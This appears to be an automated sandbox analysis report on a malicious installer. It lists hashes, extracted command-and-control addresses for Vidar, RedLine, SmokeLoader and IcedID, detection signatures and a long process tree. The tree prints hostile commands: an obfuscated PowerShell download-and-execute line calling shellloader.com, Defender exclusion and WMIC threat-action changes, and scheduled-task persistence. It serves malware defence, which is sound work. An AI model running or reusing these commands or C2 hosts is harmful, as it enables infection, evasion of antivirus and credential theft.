Resubmissions

19-09-2021 09:55

210919-lx4m7abhb4 10

19-09-2021 08:44

210919-kncbxabgh5 10

Analysis

  • max time kernel
    155s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    19-09-2021 08:44

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    7b4b44cc869a8b0f51ace918cef015ca

  • SHA1

    7b59d8a253c17d658eddbb32fe139c969aee8962

  • SHA256

    f38f738f52674e3f4689cdb299e82d40a6446ccec24abd4cac244fe64cdc07ed

  • SHA512

    78ed354bec23b5c892a7c104630ae1ebf2dfe3fc8f3ee8156af1e3ab5fa572f829856213fe31772ba9496bdfaf8dd507c0c6d8b488a9bf94bc338c4bff5141b0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

redline

Botnet

189qwe

C2

185.215.113.104:18754

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

3162718704

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 30 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:928
      • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2464
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun06c75858d552.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1264
          • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06c75858d552.exe
            Sun06c75858d552.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2616
            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
              6⤵
              • Executes dropped EXE
              PID:4232
              • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                7⤵
                • Executes dropped EXE
                PID:4396
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                  8⤵
                    PID:656
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                      9⤵
                      • Creates scheduled task(s)
                      PID:5360
                  • C:\Users\Admin\AppData\Roaming\services64.exe
                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                    8⤵
                      PID:5988
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                        9⤵
                          PID:9372
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                            10⤵
                            • Creates scheduled task(s)
                            PID:9660
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                          9⤵
                            PID:9864
                      • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4476
                        • C:\ProgramData\3005740.exe
                          "C:\ProgramData\3005740.exe"
                          8⤵
                            PID:5612
                          • C:\ProgramData\4330842.exe
                            "C:\ProgramData\4330842.exe"
                            8⤵
                              PID:6384
                            • C:\ProgramData\3059513.exe
                              "C:\ProgramData\3059513.exe"
                              8⤵
                                PID:6420
                                • C:\ProgramData\3059513.exe
                                  "C:\ProgramData\3059513.exe"
                                  9⤵
                                    PID:6608
                                • C:\ProgramData\6970926.exe
                                  "C:\ProgramData\6970926.exe"
                                  8⤵
                                    PID:6740
                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4592
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 4592 -s 1532
                                    8⤵
                                    • Program crash
                                    PID:5464
                                • C:\Users\Admin\AppData\Local\Temp\askinstall58.exe
                                  "C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"
                                  7⤵
                                    PID:5008
                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4736
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 800
                                      8⤵
                                      • Program crash
                                      PID:3460
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 836
                                      8⤵
                                      • Program crash
                                      PID:1628
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 852
                                      8⤵
                                      • Program crash
                                      PID:5104
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 872
                                      8⤵
                                      • Program crash
                                      PID:5172
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 972
                                      8⤵
                                      • Program crash
                                      PID:5304
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 1016
                                      8⤵
                                      • Program crash
                                      PID:5412
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 1320
                                      8⤵
                                      • Program crash
                                      PID:5144
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 1380
                                      8⤵
                                      • Program crash
                                      PID:5504
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 1312
                                      8⤵
                                      • Program crash
                                      PID:2340
                                  • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"
                                    7⤵
                                      PID:2160
                                    • C:\Users\Admin\AppData\Local\Temp\6.exe
                                      "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                      7⤵
                                        PID:4912
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 4912 -s 1536
                                          8⤵
                                          • Program crash
                                          PID:1192
                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                        7⤵
                                          PID:5256
                                          • C:\Users\Admin\AppData\Local\Temp\is-QL55B.tmp\setup_2.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-QL55B.tmp\setup_2.tmp" /SL5="$30248,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                            8⤵
                                              PID:5340
                                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                9⤵
                                                  PID:6148
                                                  • C:\Users\Admin\AppData\Local\Temp\is-K1Q4C.tmp\setup_2.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-K1Q4C.tmp\setup_2.tmp" /SL5="$90056,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                    10⤵
                                                      PID:2308
                                                      • C:\Users\Admin\AppData\Local\Temp\is-6TBH7.tmp\postback.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-6TBH7.tmp\postback.exe" ss1
                                                        11⤵
                                                          PID:7248
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            explorer.exe ss1
                                                            12⤵
                                                              PID:4472
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                13⤵
                                                                  PID:8928
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                    14⤵
                                                                      PID:9192
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TKqADBPgl.dll"
                                                                    13⤵
                                                                      PID:2536
                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TKqADBPgl.dll"
                                                                        14⤵
                                                                          PID:9468
                                                                          • C:\Windows\system32\regsvr32.exe
                                                                            /s "C:\Users\Admin\AppData\Local\Temp\TKqADBPgl.dll"
                                                                            15⤵
                                                                              PID:9520
                                                            • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                              7⤵
                                                                PID:5452
                                                                • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                  8⤵
                                                                    PID:4484
                                                                • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                  7⤵
                                                                    PID:6080
                                                                  • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                    7⤵
                                                                      PID:5152
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun06d6464ba08aa8a36.exe
                                                                4⤵
                                                                  PID:2928
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06d6464ba08aa8a36.exe
                                                                    Sun06d6464ba08aa8a36.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:432
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Sun0624f62ed3cfc8.exe
                                                                  4⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1328
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun0624f62ed3cfc8.exe
                                                                    Sun0624f62ed3cfc8.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2784
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                      6⤵
                                                                        PID:1588
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im chrome.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:5392
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Sun060f31ba456a.exe
                                                                    4⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1700
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun060f31ba456a.exe
                                                                      Sun060f31ba456a.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:3032
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun060f31ba456a.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun060f31ba456a.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:1868
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Sun06a0ec9fc7.exe
                                                                    4⤵
                                                                      PID:3216
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06a0ec9fc7.exe
                                                                        Sun06a0ec9fc7.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies system certificate store
                                                                        PID:3896
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im Sun06a0ec9fc7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06a0ec9fc7.exe" & del C:\ProgramData\*.dll & exit
                                                                          6⤵
                                                                            PID:6244
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im Sun06a0ec9fc7.exe /f
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:6460
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              7⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4776
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c Sun061fcef41b576c18.exe /mixone
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1528
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun061fcef41b576c18.exe
                                                                          Sun061fcef41b576c18.exe /mixone
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:2444
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 660
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:5056
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 664
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:5092
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 644
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:4812
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 644
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:4664
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 892
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:5556
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c Sun06ee1e0a2c54.exe
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:1536
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06ee1e0a2c54.exe
                                                                          Sun06ee1e0a2c54.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:2632
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c Sun06f1bd2971.exe
                                                                        4⤵
                                                                          PID:1824
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06f1bd2971.exe
                                                                            Sun06f1bd2971.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:668
                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp6AEA_tmp.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\tmp6AEA_tmp.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4680
                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp6AEA_tmp.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\tmp6AEA_tmp.exe
                                                                                7⤵
                                                                                  PID:4392
                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp6AEA_tmp.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\tmp6AEA_tmp.exe
                                                                                  7⤵
                                                                                    PID:5028
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c Sun06d03e50f999fd357.exe
                                                                              4⤵
                                                                                PID:1840
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06d03e50f999fd357.exe
                                                                                  Sun06d03e50f999fd357.exe
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3888
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-M9U82.tmp\Sun06d03e50f999fd357.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-M9U82.tmp\Sun06d03e50f999fd357.tmp" /SL5="$30058,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS0A3D1641\Sun06d03e50f999fd357.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:3884
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-M7UGF.tmp\Ze2ro.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-M7UGF.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4344
                                                                                      • C:\Program Files\Windows Mail\GIUTWXZSTA\ultramediaburner.exe
                                                                                        "C:\Program Files\Windows Mail\GIUTWXZSTA\ultramediaburner.exe" /VERYSILENT
                                                                                        8⤵
                                                                                          PID:7080
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-H74K9.tmp\ultramediaburner.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-H74K9.tmp\ultramediaburner.tmp" /SL5="$3026A,281924,62464,C:\Program Files\Windows Mail\GIUTWXZSTA\ultramediaburner.exe" /VERYSILENT
                                                                                            9⤵
                                                                                              PID:5680
                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                10⤵
                                                                                                  PID:5384
                                                                                            • C:\Users\Admin\AppData\Local\Temp\6f-94b53-a58-09e98-d92be0bff8093\Logyzhobiko.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\6f-94b53-a58-09e98-d92be0bff8093\Logyzhobiko.exe"
                                                                                              8⤵
                                                                                                PID:6556
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                  dw20.exe -x -s 2568
                                                                                                  9⤵
                                                                                                    PID:4328
                                                                                                • C:\Users\Admin\AppData\Local\Temp\d6-8fa95-d9b-9f5b9-bdbfde7971105\ZHinitexaemo.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\d6-8fa95-d9b-9f5b9-bdbfde7971105\ZHinitexaemo.exe"
                                                                                                  8⤵
                                                                                                    PID:4788
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5mnc2jpm.v4l\GcleanerEU.exe /eufive & exit
                                                                                                      9⤵
                                                                                                        PID:7720
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5mnc2jpm.v4l\GcleanerEU.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\5mnc2jpm.v4l\GcleanerEU.exe /eufive
                                                                                                          10⤵
                                                                                                            PID:7376
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xamjto5v.lls\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                          9⤵
                                                                                                            PID:7180
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xamjto5v.lls\installer.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\xamjto5v.lls\installer.exe /qn CAMPAIGN="654"
                                                                                                              10⤵
                                                                                                                PID:4236
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfhz4ltf.d0q\anyname.exe & exit
                                                                                                              9⤵
                                                                                                                PID:5868
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lfhz4ltf.d0q\anyname.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\lfhz4ltf.d0q\anyname.exe
                                                                                                                  10⤵
                                                                                                                    PID:8108
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\anmgwl1p.qmk\PublicDwlBrowser4414.exe & exit
                                                                                                                  9⤵
                                                                                                                    PID:5212
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\anmgwl1p.qmk\PublicDwlBrowser4414.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\anmgwl1p.qmk\PublicDwlBrowser4414.exe
                                                                                                                      10⤵
                                                                                                                        PID:3784
                                                                                                                        • C:\Users\Admin\AppData\Roaming\5793171.scr
                                                                                                                          "C:\Users\Admin\AppData\Roaming\5793171.scr" /S
                                                                                                                          11⤵
                                                                                                                            PID:8244
                                                                                                                          • C:\Users\Admin\AppData\Roaming\4293477.scr
                                                                                                                            "C:\Users\Admin\AppData\Roaming\4293477.scr" /S
                                                                                                                            11⤵
                                                                                                                              PID:8644
                                                                                                                            • C:\Users\Admin\AppData\Roaming\6666586.scr
                                                                                                                              "C:\Users\Admin\AppData\Roaming\6666586.scr" /S
                                                                                                                              11⤵
                                                                                                                                PID:9128
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cna12cgv.wq0\install.exe & exit
                                                                                                                            9⤵
                                                                                                                              PID:7832
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\cna12cgv.wq0\install.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\cna12cgv.wq0\install.exe
                                                                                                                                10⤵
                                                                                                                                  PID:5672
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSE891.tmp\Install.exe
                                                                                                                                    .\Install.exe
                                                                                                                                    11⤵
                                                                                                                                      PID:7548
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSEA46.tmp\Install.exe
                                                                                                                                        .\Install.exe /S /site_id "216660"
                                                                                                                                        12⤵
                                                                                                                                          PID:8132
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                            13⤵
                                                                                                                                              PID:8812
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                14⤵
                                                                                                                                                  PID:4692
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                    15⤵
                                                                                                                                                      PID:8156
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                        16⤵
                                                                                                                                                          PID:9136
                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                            17⤵
                                                                                                                                                              PID:9356
                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
